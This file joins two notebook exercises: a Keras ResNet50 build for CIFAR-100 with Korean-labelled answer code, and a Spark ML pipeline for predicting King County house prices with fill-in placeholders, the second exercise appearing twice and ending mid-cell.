use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2a')(
input_tensor)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2a')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters2,
kernel_size,
strides=strides,
padding='same',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2b')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2b')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters3, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2c')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2c')(
x)
shortcut = layers.Conv2D(
filters3, (1, 1),
strides=strides,
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '1')(
input_tensor)
shortcut = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '1')(
shortcut)
x = layers.add([x, shortcut])
x = layers.Activation('relu')(x)
return x
###Output
_____no_output_____
###Markdown
```python 정답 코드def conv_block(input_tensor, kernel_size, filters, stage, block, strides=(2, 2), use_l2_regularizer=True, batch_norm_decay=0.9, batch_norm_epsilon=1e-5): """A block that has a conv layer at shortcut. Note that from stage 3, the second conv layer at main path is with strides=(2, 2) And the shortcut should have strides=(2, 2) as well Args: input_tensor: input tensor kernel_size: default 3, the kernel size of middle conv layer at main path filters: list of integers, the filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names strides: Strides for the second conv layer in the block. use_l2_regularizer: whether to use L2 regularizer on Conv layer. batch_norm_decay: Moment of batch norm layers. batch_norm_epsilon: Epsilon of batch borm layers. Returns: Output tensor for the block. """ filters1, filters2, filters3 = filters if backend.image_data_format() == 'channels_last': bn_axis = 3 else: bn_axis = 1 conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = layers.Conv2D( filters1, (1, 1), use_bias=False, kernel_initializer='he_normal', kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), name=conv_name_base + '2a')( input_tensor) x = layers.BatchNormalization( axis=bn_axis, momentum=batch_norm_decay, epsilon=batch_norm_epsilon, name=bn_name_base + '2a')( x) x = layers.Activation('relu')(x) x = layers.Conv2D( filters2, kernel_size, strides=strides, padding='same', use_bias=False, kernel_initializer='he_normal', kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), name=conv_name_base + '2b')( x) x = layers.BatchNormalization( axis=bn_axis, momentum=batch_norm_decay, epsilon=batch_norm_epsilon, name=bn_name_base + '2b')( x) x = layers.Activation('relu')(x) x = layers.Conv2D( filters3, (1, 1), use_bias=False, kernel_initializer='he_normal', kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), name=conv_name_base + '2c')( x) x = layers.BatchNormalization( axis=bn_axis, momentum=batch_norm_decay, epsilon=batch_norm_epsilon, name=bn_name_base + '2c')( x) shortcut = layers.Conv2D( filters3, (1, 1), strides=strides, use_bias=False, kernel_initializer='he_normal', kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), name=conv_name_base + '1')( input_tensor) shortcut = layers.BatchNormalization( axis=bn_axis, momentum=batch_norm_decay, epsilon=batch_norm_epsilon, name=bn_name_base + '1')( shortcut) x = layers.add([x, shortcut]) x = layers.Activation('relu')(x) return x````
###Code
def identity_block(input_tensor,
kernel_size,
filters,
stage,
block,
use_l2_regularizer=True,
batch_norm_decay=0.9,
batch_norm_epsilon=1e-5):
# [[YOUR CODE]]
"""The identity block is the block that has no conv layer at shortcut.
Args:
input_tensor: input tensor
kernel_size: default 3, the kernel size of middle conv layer at main path
filters: list of integers, the filters of 3 conv layer at main path
stage: integer, current stage label, used for generating layer names
block: 'a','b'..., current block label, used for generating layer names
use_l2_regularizer: whether to use L2 regularizer on Conv layer.
batch_norm_decay: Moment of batch norm layers.
batch_norm_epsilon: Epsilon of batch borm layers.
Returns:
Output tensor for the block.
"""
filters1, filters2, filters3 = filters
if backend.image_data_format() == 'channels_last':
bn_axis = 3
else:
bn_axis = 1
conv_name_base = 'res' + str(stage) + block + '_branch'
bn_name_base = 'bn' + str(stage) + block + '_branch'
x = layers.Conv2D(
filters1, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2a')(
input_tensor)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2a')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters2,
kernel_size,
padding='same',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2b')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2b')(
x)
x = layers.Activation('relu')(x)
x = layers.Conv2D(
filters3, (1, 1),
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name=conv_name_base + '2c')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name=bn_name_base + '2c')(
x)
x = layers.add([x, input_tensor])
x = layers.Activation('relu')(x)
return x
###Output
_____no_output_____
###Markdown
```python 정답 코드def identity_block(input_tensor, kernel_size, filters, stage, block, use_l2_regularizer=True, batch_norm_decay=0.9, batch_norm_epsilon=1e-5): """The identity block is the block that has no conv layer at shortcut. Args: input_tensor: input tensor kernel_size: default 3, the kernel size of middle conv layer at main path filters: list of integers, the filters of 3 conv layer at main path stage: integer, current stage label, used for generating layer names block: 'a','b'..., current block label, used for generating layer names use_l2_regularizer: whether to use L2 regularizer on Conv layer. batch_norm_decay: Moment of batch norm layers. batch_norm_epsilon: Epsilon of batch borm layers. Returns: Output tensor for the block. """ filters1, filters2, filters3 = filters if backend.image_data_format() == 'channels_last': bn_axis = 3 else: bn_axis = 1 conv_name_base = 'res' + str(stage) + block + '_branch' bn_name_base = 'bn' + str(stage) + block + '_branch' x = layers.Conv2D( filters1, (1, 1), use_bias=False, kernel_initializer='he_normal', kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), name=conv_name_base + '2a')( input_tensor) x = layers.BatchNormalization( axis=bn_axis, momentum=batch_norm_decay, epsilon=batch_norm_epsilon, name=bn_name_base + '2a')( x) x = layers.Activation('relu')(x) x = layers.Conv2D( filters2, kernel_size, padding='same', use_bias=False, kernel_initializer='he_normal', kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), name=conv_name_base + '2b')( x) x = layers.BatchNormalization( axis=bn_axis, momentum=batch_norm_decay, epsilon=batch_norm_epsilon, name=bn_name_base + '2b')( x) x = layers.Activation('relu')(x) x = layers.Conv2D( filters3, (1, 1), use_bias=False, kernel_initializer='he_normal', kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), name=conv_name_base + '2c')( x) x = layers.BatchNormalization( axis=bn_axis, momentum=batch_norm_decay, epsilon=batch_norm_epsilon, name=bn_name_base + '2c')( x) x = layers.add([x, input_tensor]) x = layers.Activation('relu')(x) return x```
###Code
def resnet50(num_classes,
batch_size=None,
use_l2_regularizer=True,
rescale_inputs=False,
batch_norm_decay=0.9,
batch_norm_epsilon=1e-5):
# [[YOUR CODE]]
"""Instantiates the ResNet50 architecture.
Args:
num_classes: `int` number of classes for image classification.
batch_size: Size of the batches for each step.
use_l2_regularizer: whether to use L2 regularizer on Conv/Dense layer.
rescale_inputs: whether to rescale inputs from 0 to 1.
batch_norm_decay: Moment of batch norm layers.
batch_norm_epsilon: Epsilon of batch borm layers.
Returns:
A Keras model instance.
"""
input_shape = (32, 32, 3) # CIFAR100을 위한 input_shape 조정입니다.
img_input = layers.Input(shape=input_shape, batch_size=batch_size)
if rescale_inputs:
# Hub image modules expect inputs in the range [0, 1]. This rescales these
# inputs to the range expected by the trained model.
x = layers.Lambda(
lambda x: x * 255.0 - backend.constant(
imagenet_preprocessing.CHANNEL_MEANS,
shape=[1, 1, 3],
dtype=x.dtype),
name='rescale')(
img_input)
else:
x = img_input
if backend.image_data_format() == 'channels_first':
x = layers.Permute((3, 1, 2))(x)
bn_axis = 1
else: # channels_last
bn_axis = 3
block_config = dict(
use_l2_regularizer=use_l2_regularizer,
batch_norm_decay=batch_norm_decay,
batch_norm_epsilon=batch_norm_epsilon)
x = layers.ZeroPadding2D(padding=(3, 3), name='conv1_pad')(x)
x = layers.Conv2D(
64, (7, 7),
strides=(2, 2),
padding='valid',
use_bias=False,
kernel_initializer='he_normal',
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='conv1')(
x)
x = layers.BatchNormalization(
axis=bn_axis,
momentum=batch_norm_decay,
epsilon=batch_norm_epsilon,
name='bn_conv1')(
x)
x = layers.Activation('relu')(x)
x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x)
x = conv_block(
x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), **block_config)
x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', **block_config)
x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', **block_config)
x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', **block_config)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', **block_config)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', **block_config)
x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', **block_config)
x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', **block_config)
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b', **block_config)
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c', **block_config)
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d', **block_config)
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e', **block_config)
x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f', **block_config)
x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', **block_config)
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', **block_config)
x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', **block_config)
x = layers.GlobalAveragePooling2D()(x)
x = layers.Dense(
num_classes,
kernel_initializer=initializers.RandomNormal(stddev=0.01),
kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer),
bias_regularizer=_gen_l2_regularizer(use_l2_regularizer),
name='fc1000')(
x)
# A softmax that is followed by the model loss must be done cannot be done
# in float16 due to numeric issues. So we pass dtype=float32.
x = layers.Activation('softmax', dtype='float32')(x)
# Create model.
return models.Model(img_input, x, name='resnet50')
###Output
_____no_output_____
###Markdown
```python 정답 코드def resnet50(num_classes, batch_size=None, use_l2_regularizer=True, rescale_inputs=False, batch_norm_decay=0.9, batch_norm_epsilon=1e-5): """Instantiates the ResNet50 architecture. Args: num_classes: `int` number of classes for image classification. batch_size: Size of the batches for each step. use_l2_regularizer: whether to use L2 regularizer on Conv/Dense layer. rescale_inputs: whether to rescale inputs from 0 to 1. batch_norm_decay: Moment of batch norm layers. batch_norm_epsilon: Epsilon of batch borm layers. Returns: A Keras model instance. """ input_shape = (32, 32, 3) CIFAR100을 위한 input_shape 조정입니다. img_input = layers.Input(shape=input_shape, batch_size=batch_size) if rescale_inputs: Hub image modules expect inputs in the range [0, 1]. This rescales these inputs to the range expected by the trained model. x = layers.Lambda( lambda x: x * 255.0 - backend.constant( imagenet_preprocessing.CHANNEL_MEANS, shape=[1, 1, 3], dtype=x.dtype), name='rescale')( img_input) else: x = img_input if backend.image_data_format() == 'channels_first': x = layers.Permute((3, 1, 2))(x) bn_axis = 1 else: channels_last bn_axis = 3 block_config = dict( use_l2_regularizer=use_l2_regularizer, batch_norm_decay=batch_norm_decay, batch_norm_epsilon=batch_norm_epsilon) x = layers.ZeroPadding2D(padding=(3, 3), name='conv1_pad')(x) x = layers.Conv2D( 64, (7, 7), strides=(2, 2), padding='valid', use_bias=False, kernel_initializer='he_normal', kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), name='conv1')( x) x = layers.BatchNormalization( axis=bn_axis, momentum=batch_norm_decay, epsilon=batch_norm_epsilon, name='bn_conv1')( x) x = layers.Activation('relu')(x) x = layers.MaxPooling2D((3, 3), strides=(2, 2), padding='same')(x) x = conv_block( x, 3, [64, 64, 256], stage=2, block='a', strides=(1, 1), **block_config) x = identity_block(x, 3, [64, 64, 256], stage=2, block='b', **block_config) x = identity_block(x, 3, [64, 64, 256], stage=2, block='c', **block_config) x = conv_block(x, 3, [128, 128, 512], stage=3, block='a', **block_config) x = identity_block(x, 3, [128, 128, 512], stage=3, block='b', **block_config) x = identity_block(x, 3, [128, 128, 512], stage=3, block='c', **block_config) x = identity_block(x, 3, [128, 128, 512], stage=3, block='d', **block_config) x = conv_block(x, 3, [256, 256, 1024], stage=4, block='a', **block_config) x = identity_block(x, 3, [256, 256, 1024], stage=4, block='b', **block_config) x = identity_block(x, 3, [256, 256, 1024], stage=4, block='c', **block_config) x = identity_block(x, 3, [256, 256, 1024], stage=4, block='d', **block_config) x = identity_block(x, 3, [256, 256, 1024], stage=4, block='e', **block_config) x = identity_block(x, 3, [256, 256, 1024], stage=4, block='f', **block_config) x = conv_block(x, 3, [512, 512, 2048], stage=5, block='a', **block_config) x = identity_block(x, 3, [512, 512, 2048], stage=5, block='b', **block_config) x = identity_block(x, 3, [512, 512, 2048], stage=5, block='c', **block_config) x = layers.GlobalAveragePooling2D()(x) x = layers.Dense( num_classes, kernel_initializer=initializers.RandomNormal(stddev=0.01), kernel_regularizer=_gen_l2_regularizer(use_l2_regularizer), bias_regularizer=_gen_l2_regularizer(use_l2_regularizer), name='fc1000')( x) A softmax that is followed by the model loss must be done cannot be done in float16 due to numeric issues. So we pass dtype=float32. x = layers.Activation('softmax', dtype='float32')(x) Create model. return models.Model(img_input, x, name='resnet50')```
###Code
model = resnet50(num_classes=100)
model.summary()
# 모델 학습!!
model.compile(optimizer='adam',
loss='sparse_categorical_crossentropy',
metrics=['accuracy'])
model.fit(x_train, y_train, epochs=1) # 1 Epoch만 학습합니다.
###Output
_____no_output_____ |
spark-training/spark-python/jupyter-ml-house-prices/House Price Pipeline Exercise.ipynb | ###Markdown
Load DataLoad sales data from S3 / HDFS. We use the built-in "csv" method, which can use the first line has column names and which also supports infering the schema automatically. We use both and save some code for specifying the schema explictly.We also peek inside the data by retrieving the first five records.
###Code
from pyspark.sql.functions import *
raw_data = spark.read\
.option("header","true")\
.option("inferSchema","true")\
.csv("s3://dimajix-training/data/kc-house-data")
raw_data.limit(5).toPandas()
###Output
_____no_output_____
###Markdown
Inspect SchemaNow that we have loaded the data and that the schema was inferred automatically, let's inspect it.
###Code
# Print the schema of raw_data
# YOUR CODE HERE
###Output
_____no_output_____
###Markdown
Split training / validation setFirst we need to split the data into a training and a validation set. Spark already provides a DataFrame method called `randomSplit` which takes an array of weights (between 0 and 1) and creates as many subsets. In our example, we want to create a training data set with 80% and the validation set should contain the remaining 20%.
###Code
# Split the data - 80% for training, 20% for validation
# YOUR CODE HERE
print("training_data = " + str(training_data.count()))
print("validation_data = " + str(validation_data.count()))
###Output
_____no_output_____
###Markdown
Adding more FeaturesThe RMSE tells us that on average our prediction actually performs pretty bad. How can we improve that? Obviously we used only the size of the house for the price prediction so far, but we have a whole lot of additional information. So let's make use of that. The mathematical idea is that we create a more complex (but still linear) model that also includes other features.Let's recall that a linear model looks as follows: y = SUM(coeff[i]*x[i]) + intercept This means that we are not limited to single feature `x`, but we can use many features `x[0]...x[n]`. Let's do that with the house data! Inspect dataSince we don't have any additional information, we model some of the features differently. So far we used all features as direct linear predictors, which implies that a grade of 4 is twice as good as 2. Maybe that is not the case and not all predictors have a linear influence. Specifically nominal and ordinal features should be modeled differntly as categories. More an that later.First let's have a look at the data agin using Spark `describe`
###Code
raw_data.describe().toPandas()
###Output
_____no_output_____
###Markdown
Additionally let's check how many different zip codes are present in the data. If they are not too many, we could consider creating a one-hot encoded feature from the zip codes. We use the SQL function `countDistinct` to find the number of different zip codes.
###Code
# Count the number of distinct ZIP Codes using the SQL function countDistinct
# YOUR CODE HERE
###Output
_____no_output_____
###Markdown
New Features using One-Hot EncodingA simple but powerful method for creating new features from categories (i.e. nominal and ordinal features) is to use One-Hot-Encoding. For each nominal feature, the set of all possible values is indexed from 0 to some n. But since it cannot be assumed that larger values for n have a larger impact, a different approach is chosen. Instead each possible values is encoded by a 0/1 vector with only a single entry being one.Lets try that with the tools Spark provides to us. Indexing Nominal DataFirst we need to index the data. Since Spark cannot know, which or how many distinct values are present in a specific column, the `StringIndexer` works like a ML algorithm: First it needs to be fit to the data, thereby returning an `StringIndexerModel` which then can be used for transforming data.Let's perform both steps and let us look at the result
###Code
from pyspark.ml.feature import *
indexer = StringIndexer() \
.setInputCol("zipcode") \
.setOutputCol("zipcode_idx") \
.setHandleInvalid("keep")
# Create index model using the `fit` method
index_model = # YOUR CODE HERE
# Apply the index by using the `transform` method of the index model
indexed_zip_data = # YOUR CODE HERE
# Inspect the result
indexed_zip_data.limit(10).toPandas()
###Output
_____no_output_____
###Markdown
An alternative way of configuring the indexer is to specify all relevant parameters in its constructor as follows:
###Code
indexer = StringIndexer(
inputCol = "zipcode",
outputCol = "zipcode_idx",
handleInvalid = "keep")
###Output
_____no_output_____
###Markdown
One-Hot-EncoderNow we have a single number (the index of the value) in a new column `zipcode_idx`. But in order to use the information in a linear model, we need to create sparse vectors from this index with only exactly one `1`. This can be done with the `OneHotEncoder` transformer. This time no fitting is required, the class can be used directly with its `transform` method.
###Code
encoder = OneHotEncoder() \
.setInputCol("zipcode_idx") \
.setOutputCol("zipcode_onehot")
encoded_zip_data = encoder.transform(indexed_zip_data)
encoded_zip_data.limit(10).toPandas()
###Output
_____no_output_____
###Markdown
Creating PipelinesSince it would be tedious to add all features one after another and apply a full chain of transformations to the training set, the validation set and eventually to new data, Spark provides a `Pipeline` abstraction. A Pipeline simply contains a sequence of Transformations and (possibly multiple) machine learning algorithms. The whole pipeline then can be trained using the `fit` method which will return a `PipelineModel` instance. This instance contains all transformers and trained models and then can be used directly for prediction.
###Code
from pyspark.ml import Pipeline
from pyspark.ml.feature import *
from pyspark.ml.regression import *
pipeline = Pipeline(stages = [
# For every nominal feature, you have to create a pair of StringIndexer and OneHotEncoder.
# The StringIndexer should store its index result in some new column, which then is used
# by the OneHotEncoder to create a one-hot vector.
StringIndexer(
inputCol = "bathrooms",
outputCol = "bathrooms_idx",
handleInvalid = "keep"),
OneHotEncoder(
inputCol = "bathrooms_idx",
outputCol = "bathrooms_onehot"),
# Add StringIndexers and OneHotEncoders for the following nominal columns:
# "bedrooms", "floors", "grade", "zipcode"
# YOUR CODE HERE
# In addition add OneHotEncoder for the columns "view" and "condition"
# YOUR CODE HERE
# Now add a VectorAssembler which collects all One-Hot encoded columns and the following numeric columns:
# "sqft_living", "sqft_lot", "waterfront", "sqft_above", "sqft_basement", "yr_built", "yr_renovated", "sqft_living15", "sqft_lot15"
# YOUR CODE HERE
# Finally add a LinearRegression which uses the output of the VectorAssembler as features and the
# target variable "price" as label column
# YOUR CODE HERE
]
)
###Output
_____no_output_____
###Markdown
Train model with training dataOnce you created the `Pipeline`, you can fit it in a single step using the `fit` method. This will return an instance of the class `PipelineModel`. Assign this model instace to a value called `model`.And remember: Use the training data for fitting!
###Code
model = # YOUR CODE HERE
###Output
_____no_output_____
###Markdown
Evaluate model using validation dataNow that we have a model, we need to measure its performance. This requires that predictions are created by applying the model to the validation data by using the `transform` method of the moodel. The quality metric of the prediction is implemented in the `RegressionEvaluator` class from the Spark ML evaluation package. Create an instance of the evaluator and configure it appropriately to use the column `price` as the target (label) variable and the column `prediction` (which has been created by the pipeline model) as the prediction column. Also remember to set the metric name to `rmse`. Finally feed in the predicted data into the evaluator, which in turn will calculate the desired quality metric (RMSE in our case).
###Code
from pyspark.ml.evaluation import *
# Create and configure a RegressionEvaluator
evaluator = # YOUR CODE HERE
# Create predictions of the validationData by using the "transform" method of the model
pred = # YOUR CODE HERE
# Now measure the quality of the prediction by using the "evaluate" method of the evaluator
rmse = # YOUR CODE HERE
print("RMSE = " + str(rmse))
###Output
_____no_output_____
###Markdown
Adding more modelsAnother way of improving the overall prediction is to add multiple models to a single Pipeline. Each downstream ML algorithm has access to the prediction of the previous stages. This way we can create two independant models and eventually fit a mixed model as the last step. In this example we want to use a simple linear model created by a `LinearRegression` and combine that model with a Poisson model created by a `GeneralizedLinearRegression`. The results of both models eventually are combined using a final `LinearRegression` model.
###Code
pipeline = Pipeline(stages = [
# Extract all features as done before including the VectorAssembler as the last step
# YOUR CODE HERE
# Now add a LinearRegression, but the prediction should be stored in a column "linear_prediction" instead of the default column.
# This will be our first (linear) prediciton
# YOUR CODE HERE
# Now add a GeneralizedLinearRegression, which should also use the features as its input and the price as the target
# variable. Lookup settings for the GeneralizedLinearRegression in the Spark documentation and select the "poisson"
# family and the "log" link function. The prediction column should be "poisson_prediction"
# YOUR CODE HERE
# Now create a new feature from both prediction columns from both regressions above. This is done by using
# a new VectorAssembler. Set the name of the feature column to "pred_features"
# YOUR CODE HERE
LinearRegression(
featuresCol = "pred_features",
labelCol = "price",
predictionCol = "prediction")
]
)
###Output
_____no_output_____
###Markdown
Train model with training dataAgain as usual we train a model using the `fit` method of the pipeline.
###Code
model = # YOUR CODE HERE
###Output
_____no_output_____
###Markdown
Evaluate model using validation dataAnd eventually we measure the performance of the combined model by using the evaluator created some steps above.
###Code
# First create predictions by applying the learnt pipeline model to the validation data
pred = # YOUR CODE HERE
# And now calculate the performance metric by using the evaluator on the predictions
rmse = # YOUR CODE HERE
print("RMSE = " + str(rmse))
###Output
_____no_output_____
###Markdown
Inspect ModelLet us inspect the coefficients of the last step, which tells us which of both models (linear or poisson) has more weight.
###Code
model.stages[len(model.stages)-1].coefficients
###Output
_____no_output_____
###Markdown
Load DataLoad sales data from S3 / HDFS. We use the built-in "csv" method, which can use the first line has column names and which also supports infering the schema automatically. We use both and save some code for specifying the schema explictly.We also peek inside the data by retrieving the first five records.
###Code
from pyspark.sql.functions import *
raw_data = spark.read\
.option("header","true")\
.option("inferSchema","true")\
.csv("s3://dimajix-training/data/kc-house-data")
raw_data.limit(5).toPandas()
###Output
_____no_output_____
###Markdown
Inspect SchemaNow that we have loaded the data and that the schema was inferred automatically, let's inspect it.
###Code
# Print the schema of raw_data
# YOUR CODE HERE
###Output
_____no_output_____
###Markdown
Split training / validation setFirst we need to split the data into a training and a validation set. Spark already provides a DataFrame method called `randomSplit` which takes an array of weights (between 0 and 1) and creates as many subsets. In our example, we want to create a training data set with 80% and the validation set should contain the remaining 20%.
###Code
# Split the data - 80% for training, 20% for validation
# YOUR CODE HERE
print("training_data = " + str(training_data.count()))
print("validation_data = " + str(validation_data.count()))
###Output
_____no_output_____
###Markdown
Adding more FeaturesThe RMSE tells us that on average our prediction actually performs pretty bad. How can we improve that? Obviously we used only the size of the house for the price prediction so far, but we have a whole lot of additional information. So let's make use of that. The mathematical idea is that we create a more complex (but still linear) model that also includes other features.Let's recall that a linear model looks as follows: y = SUM(coeff[i]*x[i]) + intercept This means that we are not limited to single feature `x`, but we can use many features `x[0]...x[n]`. Let's do that with the house data! Inspect dataSince we don't have any additional information, we model some of the features differently. So far we used all features as direct linear predictors, which implies that a grade of 4 is twice as good as 2. Maybe that is not the case and not all predictors have a linear influence. Specifically nominal and ordinal features should be modeled differntly as categories. More an that later.First let's have a look at the data agin using Spark `describe`
###Code
raw_data.describe().toPandas()
###Output
_____no_output_____
###Markdown
Additionally let's check how many different zip codes are present in the data. If they are not too many, we could consider creating a one-hot encoded feature from the zip codes. We use the SQL function `countDistinct` to find the number of different zip codes.
###Code
# Count the number of distinct ZIP Codes using the SQL function countDistinct
# YOUR CODE HERE
###Output
_____no_output_____
###Markdown
New Features using One-Hot EncodingA simple but powerful method for creating new features from categories (i.e. nominal and ordinal features) is to use One-Hot-Encoding. For each nominal feature, the set of all possible values is indexed from 0 to some n. But since it cannot be assumed that larger values for n have a larger impact, a different approach is chosen. Instead each possible values is encoded by a 0/1 vector with only a single entry being one.Lets try that with the tools Spark provides to us. Indexing Nominal DataFirst we need to index the data. Since Spark cannot know, which or how many distinct values are present in a specific column, the `StringIndexer` works like a ML algorithm: First it needs to be fit to the data, thereby returning an `StringIndexerModel` which then can be used for transforming data.Let's perform both steps and let us look at the result
###Code
from pyspark.ml.feature import *
indexer = StringIndexer() \
.setInputCol("zipcode") \
.setOutputCol("zipcode_idx") \
.setHandleInvalid("keep")
# Create index model using the `fit` method
index_model = # YOUR CODE HERE
# Apply the index by using the `transform` method of the index model
indexed_zip_data = # YOUR CODE HERE
# Inspect the result
indexed_zip_data.limit(10).toPandas()
###Output
_____no_output_____
###Markdown
An alternative way of configuring the indexer is to specify all relevant parameters in its constructor as follows:
###Code
indexer = StringIndexer(
inputCol = "zipcode",
outputCol = "zipcode_idx",
handleInvalid = "keep")
###Output
_____no_output_____
###Markdown
One-Hot-EncoderNow we have a single number (the index of the value) in a new column `zipcode_idx`. But in order to use the information in a linear model, we need to create sparse vectors from this index with only exactly one `1`. This can be done with the `OneHotEncoder` transformer. This time no fitting is required, the class can be used directly with its `transform` method.
###Code
encoder = OneHotEncoder() \
.setInputCol("zipcode_idx") \
.setOutputCol("zipcode_onehot")
encoded_zip_data = encoder.transform(indexed_zip_data)
encoded_zip_data.limit(10).toPandas()
###Output
_____no_output_____
###Markdown
Creating PipelinesSince it would be tedious to add all features one after another and apply a full chain of transformations to the training set, the validation set and eventually to new data, Spark provides a `Pipeline` abstraction. A Pipeline simply contains a sequence of Transformations and (possibly multiple) machine learning algorithms. The whole pipeline then can be trained using the `fit` method which will return a `PipelineModel` instance. This instance contains all transformers and trained models and then can be used directly for prediction.
###Code
from pyspark.ml import Pipeline
from pyspark.ml.feature import *
from pyspark.ml.regression import *
pipeline = Pipeline(stages = [
# For every nominal feature, you have to create a pair of StringIndexer and OneHotEncoder.
# The StringIndexer should store its index result in some new column, which then is used
# by the OneHotEncoder to create a one-hot vector.
StringIndexer(
inputCol = "bathrooms",
outputCol = "bathrooms_idx",
handleInvalid = "keep"),
OneHotEncoder(
inputCol = "bathrooms_idx",
outputCol = "bathrooms_onehot"),
# Add StringIndexers and OneHotEncoders for the following nominal columns:
# "bedrooms", "floors", "grade", "zipcode"
# YOUR CODE HERE
# In addition add OneHotEncoder for the columns "view" and "condition"
# YOUR CODE HERE
# Now add a VectorAssembler which collects all One-Hot encoded columns and the following numeric columns:
# "sqft_living", "sqft_lot", "waterfront", "sqft_above", "sqft_basement", "yr_built", "yr_renovated", "sqft_living15", "sqft_lot15"
# YOUR CODE HERE
# Finally add a LinearRegression which uses the output of the VectorAssembler as features and the
# target variable "price" as label column
# YOUR CODE HERE
]
)
###Output
_____no_output_____
###Markdown
Train model with training dataOnce you created the `Pipeline`, you can fit it in a single step using the `fit` method. This will return an instance of the class `PipelineModel`. Assign this model instace to a value called `model`.And remember: Use the training data for fitting!
###Code
model = # YOUR CODE HERE
###Output
_____no_output_____
###Markdown
Evaluate model using validation dataNow that we have a model, we need to measure its performance. This requires that predictions are created by applying the model to the validation data by using the `transform` method of the moodel. The quality metric of the prediction is implemented in the `RegressionEvaluator` class from the Spark ML evaluation package. Create an instance of the evaluator and configure it appropriately to use the column `price` as the target (label) variable and the column `prediction` (which has been created by the pipeline model) as the prediction column. Also remember to set the metric name to `rmse`. Finally feed in the predicted data into the evaluator, which in turn will calculate the desired quality metric (RMSE in our case).
###Code
from pyspark.ml.evaluation import *
# Create and configure a RegressionEvaluator
evaluator = # YOUR CODE HERE
# Create predictions of the validationData by using the "transform" method of the model
pred = # YOUR CODE HERE
# Now measure the quality of the prediction by using the "evaluate" method of the evaluator
rmse = # YOUR CODE HERE
print("RMSE = " + str(rmse))
###Output
_____no_output_____
###Markdown
Adding more modelsAnother way of improving the overall prediction is to add multiple models to a single Pipeline. Each downstream ML algorithm has access to the prediction of the previous stages. This way we can create two independant models and eventually fit a mixed model as the last step. In this example we want to use a simple linear model created by a `LinearRegression` and combine that model with a Poisson model created by a `GeneralizedLinearRegression`. The results of both models eventually are combined using a final `LinearRegression` model.
###Code
pipeline = Pipeline(stages = [
# Extract all features as done before including the VectorAssembler as the last step
# YOUR CODE HERE
# Now add a LinearRegression, but the prediction should be stored in a column "linear_prediction" instead of the default column.
# This will be our first (linear) prediciton
# YOUR CODE HERE
# Now add a GeneralizedLinearRegression, which should also use the features as its input and the price as the target
# variable. Lookup settings for the GeneralizedLinearRegression in the Spark documentation and select the "poisson"
# family and the "log" link function. The prediction column should be "poisson_prediction"
# YOUR CODE HERE
# Now create a new feature from both prediction columns from both regressions above. This is done by using
# a new VectorAssembler. Set the name of the feature column to "pred_features"
# YOUR CODE HERE
LinearRegression(
featuresCol = "pred_features",
labelCol = "price",
predictionCol = "prediction")
]
)
###Output
_____no_output_____
###Markdown
Train model with training dataAgain as usual we train a model using the `fit` method of the pipeline.
###Code
model = # YOUR CODE HERE
###Output
_____no_output_____
###Markdown
Evaluate model using validation dataAnd eventually we measure the performance of the combined model by using the evaluator created some steps above.
###Code
# First create predictions by applying the learnt pipeline model to the validation data
